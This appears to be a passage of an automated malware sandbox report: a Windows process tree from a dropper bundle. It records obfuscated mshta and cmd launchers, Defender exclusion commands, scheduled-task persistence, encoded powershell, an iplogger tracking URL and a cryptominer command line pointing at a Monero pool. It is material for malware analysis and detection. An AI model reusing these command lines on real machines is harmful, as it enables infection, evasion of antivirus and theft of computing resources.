C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"7⤵
- Executes dropped EXE
PID:1824 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵PID:2720
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"9⤵PID:2308
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"10⤵
- Kills process with taskkill
PID:3376
-
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi10⤵PID:3368
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )11⤵PID:3716
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"12⤵PID:3588
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )11⤵PID:3924
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC12⤵PID:3992
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"13⤵PID:2756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "13⤵PID:976
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC13⤵PID:2200
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
PID:2700 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:3884
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
PID:3692
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\juanli-game.exe"C:\Users\Admin\AppData\Local\Temp\juanli-game.exe"7⤵
- Executes dropped EXE
PID:1636
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵
- Executes dropped EXE
PID:1996
-
-
C:\Users\Admin\AppData\Local\Temp\10.exe"C:\Users\Admin\AppData\Local\Temp\10.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2228 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2228 -s 16928⤵
- Program crash
PID:3212
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵
- Executes dropped EXE
PID:768 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵PID:3792
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:3228
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
- Blocklisted process makes network request
- Creates scheduled task(s)
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:908
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:3240
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe10⤵PID:3396
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵PID:2508
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"12⤵PID:3232
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"13⤵PID:2336
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth12⤵PID:852
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09c6db969ab9.exe4⤵
- Loads dropped DLL
PID:1628 -
C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue09c6db969ab9.exeTue09c6db969ab9.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1132 -
C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue09c6db969ab9.exeC:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue09c6db969ab9.exe6⤵
- Executes dropped EXE
PID:2676
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue09c6db969ab9.exeC:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue09c6db969ab9.exe6⤵PID:2064
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue09c6db969ab9.exeC:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue09c6db969ab9.exe6⤵PID:3140
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue09c6db969ab9.exeC:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue09c6db969ab9.exe6⤵PID:3256
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09a30919dc5f00.exe4⤵
- Loads dropped DLL
PID:1672 -
C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue09a30919dc5f00.exeTue09a30919dc5f00.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1040 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscrIPT: CLosE( creatEobjeCt("WSCRIpt.Shell" ).RUN( "C:\Windows\system32\cmd.exe /R TYPe ""C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue09a30919dc5f00.exe"" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 & If """" == """" for %b In (""C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue09a30919dc5f00.exe"" ) do taskkill /f /iM ""%~Nxb"" " , 0 , TRUe ) )6⤵PID:2212
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue09a30919dc5f00.exe" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 &If "" == "" for %b In ("C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue09a30919dc5f00.exe" ) do taskkill /f /iM "%~Nxb"7⤵PID:2556
-
C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u868⤵
- Executes dropped EXE
PID:2652 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscrIPT: CLosE( creatEobjeCt("WSCRIpt.Shell" ).RUN( "C:\Windows\system32\cmd.exe /R TYPe ""C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe"" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 & If ""-PhwqM9LteEkjDz5gZPyhw9N49u86 "" == """" for %b In (""C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe"" ) do taskkill /f /iM ""%~Nxb"" " , 0 , TRUe ) )9⤵PID:2820
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 &If "-PhwqM9LteEkjDz5gZPyhw9N49u86 " == "" for %b In ("C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe" ) do taskkill /f /iM "%~Nxb"10⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2044
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscrIpT:cloSE (cREateObJEct( "wsCRipt.SheLl" ).rUn( "Cmd.exe /q /R ecHo | sEt /P = ""MZ"" > ~dWBNpV.F & Copy /b /y ~dWbNpV.F +YsLNPQ.k + 9Jd86KPL.RS + 6VTZU.XA8+CQ3X0._+ 3hAXC.X ..\2GBhNGG.N &sTaRt msiexec.exe /y ..\2GbhNGG.n & DEl /Q * " ,0, TRue))9⤵PID:3028
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R ecHo | sEt /P = "MZ" > ~dWBNpV.F &Copy /b /y ~dWbNpV.F +YsLNPQ.k + 9Jd86KPL.RS + 6VTZU.XA8+CQ3X0._+ 3hAXC.X ..\2GBhNGG.N &sTaRt msiexec.exe /y ..\2GbhNGG.n & DEl /Q *10⤵PID:2388
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>~dWBNpV.F"11⤵PID:3932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHo "11⤵PID:3924
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /y ..\2GbhNGG.n11⤵PID:4088
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /iM "Tue09a30919dc5f00.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2680
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09c1731fe55c7.exe4⤵
- Loads dropped DLL
PID:1000 -
C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue09c1731fe55c7.exeTue09c1731fe55c7.exe5⤵
- Executes dropped EXE
PID:1364 -
C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue09c1731fe55c7.exeC:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue09c1731fe55c7.exe6⤵
- Executes dropped EXE
PID:2944
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09786995c7f02a923.exe4⤵
- Loads dropped DLL
PID:1152 -
C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue09786995c7f02a923.exeTue09786995c7f02a923.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1012 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\3284079687.exe"6⤵PID:3016
-
C:\Users\Admin\AppData\Local\Temp\3284079687.exe"C:\Users\Admin\AppData\Local\Temp\3284079687.exe"7⤵
- Executes dropped EXE
PID:2360 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 5768⤵
- Program crash
PID:3660
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1512887311.exe"6⤵
- Blocklisted process makes network request
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1960 -
C:\Users\Admin\AppData\Local\Temp\1512887311.exe"C:\Users\Admin\AppData\Local\Temp\1512887311.exe"7⤵PID:3544
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Tue09786995c7f02a923.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue09786995c7f02a923.exe" & exit6⤵PID:3164
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Tue09786995c7f02a923.exe" /f7⤵
- Suspicious use of SetThreadContext
- Kills process with taskkill
PID:1364
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0947ef38552fc.exe4⤵
- Loads dropped DLL
PID:1232 -
C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue0947ef38552fc.exeTue0947ef38552fc.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1960 -
C:\Users\Public\run.exeC:\Users\Public\run.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2288 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵PID:1672
-
-
-
C:\Users\Public\run2.exeC:\Users\Public\run2.exe6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1912 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/18tji77⤵
- Suspicious use of AdjustPrivilegeToken
PID:908 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:908 CREDAT:275457 /prefetch:28⤵PID:2240
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09792fda06e.exe4⤵
- Loads dropped DLL
PID:1632 -
C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue09792fda06e.exeTue09792fda06e.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1640
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue091e2054cef7.exe4⤵
- Loads dropped DLL
PID:1784 -
C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue091e2054cef7.exeTue091e2054cef7.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1660 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Dzpafigaxd.vbs"6⤵
- Loads dropped DLL
PID:1800 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google\Qekdqa.exe'7⤵PID:3092
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dzpafigaxd.vbs"6⤵PID:1608
-
C:\Users\Admin\AppData\Local\Temp\Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe"C:\Users\Admin\AppData\Local\Temp\Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe"7⤵PID:2532
-
-
-
C:\Users\Admin\AppData\Local\Temp\MSBuild.exeC:\Users\Admin\AppData\Local\Temp\MSBuild.exe6⤵PID:3304
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com7⤵PID:3424
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\jjjmjcyo.vbs"7⤵PID:3756
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\8⤵PID:2916
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAEkAZAAgADMAMwAwADQAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABvAGEAbgBzAG8AawB5AHIALgBlAHgAZQAiADsAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAzADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwATQBTAEIAdQBpAGwAZAAuAGUAeABlACIAIAAtAEYAbwByAGMAZQA=7⤵PID:3428
-
C:\Users\Admin\AppData\Local\Temp\oansokyr.exe"C:\Users\Admin\AppData\Local\Temp\oansokyr.exe"8⤵PID:456
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Arjnavlnnfsgdjk.vbs"9⤵PID:2960
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google\Chrome.exe'10⤵PID:3276
-
-
-
C:\Users\Admin\AppData\Local\Temp\MSBuild.exeC:\Users\Admin\AppData\Local\Temp\MSBuild.exe9⤵PID:3760
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com10⤵PID:3124
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAG8AdgBvAGYAYQBvAC4AZQB4AGUAIgA=10⤵PID:1076
-
C:\Users\Admin\AppData\Local\Temp\ovofao.exe"C:\Users\Admin\AppData\Local\Temp\ovofao.exe"11⤵PID:2752
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09264824c4.exe4⤵
- Loads dropped DLL
PID:1140 -
C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue09264824c4.exeTue09264824c4.exe5⤵PID:956
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0990c8b597f.exe4⤵
- Loads dropped DLL
PID:1532 -
C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue0990c8b597f.exeTue0990c8b597f.exe5⤵PID:2044
-
C:\Users\Admin\AppData\Local\Temp\is-RKJUF.tmp\Tue0990c8b597f.tmp"C:\Users\Admin\AppData\Local\Temp\is-RKJUF.tmp\Tue0990c8b597f.tmp" /SL5="$2017C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue0990c8b597f.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2076 -
C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue0990c8b597f.exe"C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue0990c8b597f.exe" /SILENT7⤵
- Executes dropped EXE
PID:2252 -
C:\Users\Admin\AppData\Local\Temp\is-QLSNA.tmp\Tue0990c8b597f.tmp"C:\Users\Admin\AppData\Local\Temp\is-QLSNA.tmp\Tue0990c8b597f.tmp" /SL5="$3017C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue0990c8b597f.exe" /SILENT8⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2348 -
C:\Users\Admin\AppData\Local\Temp\is-FVJL0.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-FVJL0.tmp\postback.exe" ss19⤵
- Executes dropped EXE
PID:3004
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0956c36b51.exe /mixone4⤵
- Loads dropped DLL
PID:836 -
C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue0956c36b51.exeTue0956c36b51.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1420 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Tue0956c36b51.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue0956c36b51.exe" & exit6⤵PID:2692
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue093cbcf0222440.exe4⤵
- Loads dropped DLL
PID:1072 -
C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue093cbcf0222440.exeTue093cbcf0222440.exe5⤵
- Executes dropped EXE
PID:1800 -
C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue093cbcf0222440.exe"C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue093cbcf0222440.exe" -u6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1892
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0971aafeebb6f.exe4⤵
- Loads dropped DLL
PID:2016 -
C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue0971aafeebb6f.exeTue0971aafeebb6f.exe5⤵
- Executes dropped EXE
PID:1484 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1484 -s 7326⤵
- Program crash
PID:3624
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4E20.exeC:\Users\Admin\AppData\Local\Temp\4E20.exe1⤵PID:3788
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"2⤵PID:1868
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {D9390279-69E2-4C0C-AFF7-6ABA5E772687} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Executes dropped EXE
PID:1772
-
C:\Windows\system32\taskeng.exetaskeng.exe {9B8B109E-E5B4-4907-ABF5-92AB10DA7D6B} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:3360
-
C:\Windows\system32\taskeng.exetaskeng.exe {17979DE0-A3C9-419A-BEAF-0C14A822E246} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2188
-
C:\Program Files\Mozilla Firefox\default-browser-agent.exe"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task2⤵PID:2104
-
-
C:\Users\Admin\AppData\Roaming\fuighdsC:\Users\Admin\AppData\Roaming\fuighds2⤵PID:3632
-